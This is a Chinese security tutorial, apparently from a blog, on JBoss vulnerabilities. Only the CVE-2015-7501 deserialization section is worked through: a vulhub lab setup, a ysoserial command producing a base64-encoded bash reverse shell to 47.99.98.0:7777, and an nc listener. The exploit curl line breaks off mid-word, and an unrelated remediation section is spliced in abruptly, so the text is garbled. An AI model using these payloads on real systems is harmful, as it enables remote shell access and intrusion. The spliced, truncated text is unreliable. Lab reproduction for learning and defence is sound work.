常见中间件漏洞(三、Jboss合集)

目录

三、Jboss

Jboss介绍

3.1 CVE-2015-7501

漏洞介绍

影响范围

环境搭建

漏洞复现

3.2 CVE-2017-7504

漏洞介绍

影响范围

环境搭建

漏洞复现

3.3 CVE-2017-12149

漏洞简述

漏洞范围

漏洞复现

3.4 Administration Console弱囗令

漏洞描述

影响版本

环境搭建

密码文件

漏洞复现

3.5 低版本JMX Console未授权

漏洞描述

影响范围

环境搭建

漏洞复现

3.6 高版本JMX Console未授权

漏洞描述

影响版本

环境搭建

漏洞复现


三、Jboss

Jboss介绍

JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域JBoss是发展最为迅速应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发这使得JBoss广为流行。

3.1 CVE-2015-7501

Jboss JMXInvokerServlet 反序列化漏洞

漏洞介绍

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象然后我们利用Apache Commons Collections中的 Gadget 执行任意代码

影响范围

JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0 CP10

JBoss AS (Wildly) 6 and earlierJBoss A-MQ 6.2.0

JBoss Fuse 6.2.0

JBoss SOA Platform(SOA-P) 5.3.1

JBoss Data Grid (JDG) 6.5.0

JBOSS BRMS (BRMS) 6.1.0

JBOSS BPMS (BPMS) 6.1.0

JBoss Data Virtualization (JDV) 6.1.0

JBoss Fuse Service Works (FSW) 6.0.0

JBoss Enterprise Web Server(EWS) 2.1,3.0

环境搭建
cd vulhub/jboss/JMXInvokerServlet-deserialization

docker-compose up -d

漏洞复现

1.POC,访问地址

http://47.99.98.0:8080/invoker/JMXInvokerServlet

返回如下,说明接口开放,此接口存在反序列化漏洞

2.下载 ysoserial 工具进行漏洞利用

https://github.com/frohoff/ysoserial

将反弹shell进行base64编码

bash -i >& /dev/tcp/47.99.98.0/7777 0>&1

java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45OS45OC4wLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}">exp.ser

3.服务器设置监听得端⼝

nc -lvvp 7777

4.执行命令

curl http://47.99.98.0:8080/invoker/JMXInvo
### 关于 JBoss 中间件常见安全漏洞及其解决方案 #### 反序列化漏洞 JBoss存在反序列化漏洞,这使得攻击者能够通过精心构造的数据包执行任意代码。此类漏洞通常存在于处理外部输入数据的过程中,在某些情况下可能被利用来远程控制受影响的服务器[^1]。 对于这类问题,官方建议升级到最新版本并打上所有可用补丁;如果无法立即更新,则应考虑禁用不必要的组件和服务以减少暴露面。另外,配置防火墙规则限制对特定端口和路径的访问也可以有效缓解风险。 #### 配置不当引发的安全隐患 除了上述提到的技术层面缺陷外,错误配置同样会给黑客留下可乘之机。例如,默认账户未更改密码、开放过多权限给应用程序用户等都属于高危操作。因此定期审查环境设置至关重要,确保遵循最小特权原则分配资源访问权,并启用审计跟踪记录重要事件以便事后分析。 针对以上情况,可以采取如下措施加强防护: - 修改默认管理员账号信息; - 移除或锁定不再使用的测试/临时ID; - 细粒度调整角色定义,仅授予完成工作所需的最低限度授权; - 开启日志监控机制,及时发现异常行为模式。 ```bash # 示例命令:修改默认管理用户名字和密码(具体实现取决于所处的操作系统) $ sudo passwd jboss_admin_user Changing password for user jboss_admin_user. New password: Retype new password: passwd: all authentication tokens updated successfully. ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值